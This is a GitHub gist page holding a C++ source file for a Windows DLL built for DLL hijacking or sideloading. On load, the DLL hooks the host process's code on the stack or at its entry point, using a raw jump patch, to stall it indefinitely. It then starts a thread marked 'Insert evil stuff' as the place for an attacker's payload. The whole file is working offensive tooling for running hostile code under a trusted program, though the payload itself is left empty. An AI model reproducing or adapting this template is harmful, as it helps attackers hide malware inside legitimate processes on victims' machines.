Skip to content

Instantly share code, notes, and snippets.

@kafkaesqu3

kafkaesqu3/main.cpp

Forked from monoxgas/main.cpp
Created December 18, 2020 16:00
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save kafkaesqu3/c96d7ed624879138e7386c161a11c5fc to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save kafkaesqu3/c96d7ed624879138e7386c161a11c5fc to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @monoxgas monoxgas created this gist Feb 12, 2020.
    116 changes: 116 additions & 0 deletions main.cpp
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,116 @@
    #include <Windows.h>
    #include <intrin.h>
    #include <string>
    #include <TlHelp32.h>
    #include <psapi.h>

    DWORD WINAPI Thread(LPVOID lpParam) {
    // Insert evil stuff

    ExitProcess(0);
    return 1;
    }

    void DoNothing() {
    while (true) Sleep(10 * 1000);
    }

    void InstallHook(PVOID address, PVOID jump) {
    BYTE Jump[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 };

    DWORD old;
    VirtualProtect(address, sizeof(Jump), 0x40, &old);

    RtlCopyMemory(address, Jump, 12);
    RtlCopyMemory(((PBYTE)address + 2), &jump, 8);

    VirtualProtect(address, sizeof(Jump), old, &old);
    }

    BOOL HookTheStack() {

    // Get primary module info

    PBYTE baseAddress = NULL;
    DWORD baseSize = 0;

    WCHAR fileName[MAX_PATH];
    GetProcessImageFileName((HANDLE)-1, fileName, MAX_PATH);
    std::wstring pathString = std::wstring(fileName);

    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId());

    MODULEENTRY32 pEntry;
    pEntry.dwSize = sizeof(pEntry);
    BOOL hRes = Module32Next(hSnapShot, &pEntry);
    while (hRes)
    {
    if (pathString.find(pEntry.szModule) != std::wstring::npos) {
    baseAddress = pEntry.modBaseAddr;
    baseSize = pEntry.modBaseSize;
    break;
    }
    hRes = Module32Next(hSnapShot, &pEntry);
    }
    CloseHandle(hSnapShot);

    if (!baseAddress || !baseSize)
    return FALSE;

    // Hunt the stack

    PBYTE ldrLoadDll = (PBYTE)GetProcAddress(GetModuleHandle(L"ntdll"), "LdrLoadDll");
    PBYTE * stack = (PBYTE *)_AddressOfReturnAddress();
    BOOL foundLoadDll = FALSE;

    ULONG_PTR lowLimit, highLimit;
    GetCurrentThreadStackLimits(&lowLimit, &highLimit);

    for (; (ULONG_PTR)stack < highLimit; stack++) {
    if (*stack < (PBYTE)0x1000)
    continue;

    if (*stack > ldrLoadDll && *stack < ldrLoadDll + 0x1000) {
    // LdrLoadDll is in the stack, let's start looking for our module
    foundLoadDll = TRUE;
    }

    if (foundLoadDll && *stack > baseAddress && *stack < (baseAddress + baseSize)) {
    MEMORY_BASIC_INFORMATION mInfo = { 0 };
    VirtualQuery(*stack, &mInfo, sizeof(mInfo));

    if (!(mInfo.Protect & PAGE_EXECUTE_READ))
    continue;

    // Primary module is in the stack, let's hook there
    InstallHook(*stack, DoNothing);

    return TRUE;
    }
    }

    // No references found, let's just hook the entry point

    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress;
    PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(baseAddress + dosHeader->e_lfanew);
    PBYTE entryPoint = baseAddress + ntHeader->OptionalHeader.AddressOfEntryPoint;

    InstallHook(entryPoint, &DoNothing);

    return TRUE;
    }

    BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {

    if (ul_reason_for_call != DLL_PROCESS_ATTACH)
    return TRUE;

    if (!HookTheStack())
    return TRUE;

    DWORD dwThread;
    HANDLE hThread = CreateThread(NULL, 0, Thread, NULL, 0, &dwThread);

    return TRUE;
    }